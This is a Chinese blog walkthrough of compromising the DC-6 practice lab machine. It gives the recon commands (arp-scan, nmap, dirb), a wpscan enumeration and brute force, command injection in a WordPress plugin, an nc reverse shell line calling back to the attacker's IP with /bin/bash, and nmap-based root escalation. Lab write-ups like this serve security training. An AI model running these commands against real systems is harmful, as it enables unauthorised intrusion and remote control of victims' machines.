渗透DC-6-命令注入-nc反弹shell


0x00 DC-6环境介绍

DC-6考察知识点为命令注入,中间寻找线索的途径稍微有点曲折,小黄将正确思路笔记记下,自己第一次还得多研究研究

0x01 信息收集

1)IP收集—192.168.213.148
同局域网使用arp扫描,当然也可以使用nmap都行

arp-scan -l

2)端口收集 nmap扫描全端口–ssh端口:22 web页面端口:80

nmap  -A -p- 192.168.213.148

3)目录枚举出后台地址 —wordy/wp-admin/

dirb http://wordy

登录web页面继续寻找信息

0x02 渗透测试

登录web页面,发现开源框架,使用wpscan爆破网站账号

wpscan --url http://wordy -e u

发现三个账号
通过信息收集到/usr/wordlists/rockyou.txt.gz好像是一个密码字典,将收集账号作为账户字典,通过zcat查看压缩文件内容,将k01内容提取出来内容作为密码字典爆破

zcat /usr/wordlists/rockyou.txt.gz | grep k01 > /tmp/dc-6pass.txt

账号字典
密码字典
爆破出一个账号与密码

wpscan --url http://wordy -U /root/桌面/1.txt -P /tmp/dc-6pass.txt

爆破出后台账号
登录后台信息收集
登录后台
经过检测,在后台发现命令注入,
命令注入
通过 searchsploit 搜索 activeity monitor(活动监视器)

sudo searchsploit activeity monitor

利用脚本
查看插件脚本漏洞,提示使用nc反弹端口接受shell
nc反弹shell

发现输入信息长度有限制,无法使用更多的命令,通过修改js代码,将内容限制加大,输入

修改js限制输入长度代码

nc反弹shell:

1.攻击机使用nc接受指定端口等待 nc -lnvp 1111
2.受害机将shell权限指定IP端口发送外联 nc 192.168.213.129 1111 -e /bin/bash
3.攻击机接受shell
获得普通用户shell
使用pytohn插件优化shell显示
优化shell
通过信息收集发现敏感账户,以及一个账户密码
账户

进入目录一一查看,发现一个账号密码
发现账号
使用ssh登录账号
登录ssh
查看用户权限操作

sudo -l

发现只能以jens运行

以jens路径编辑脚本,将里面命令注释,加入我们想要的命令
加入sudo -l 运行发现新的提权命令
准备开始提权

0x03 权限提升

提示我们使用nmap提权,使用namp可以无需密码权限使用,

提权思路: 将root权限bin/sh写入脚本插件,使用nmap运行脚本插件
使用namp执行脚本,执行命令不会显示命令,建议使用python交互shell后更直观,提权成功
提权成功

渗透结束

第一次尝试渗透靶机还得多研究,小黄将全部正确思路写出,并没有将曲折的经历写上。


文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录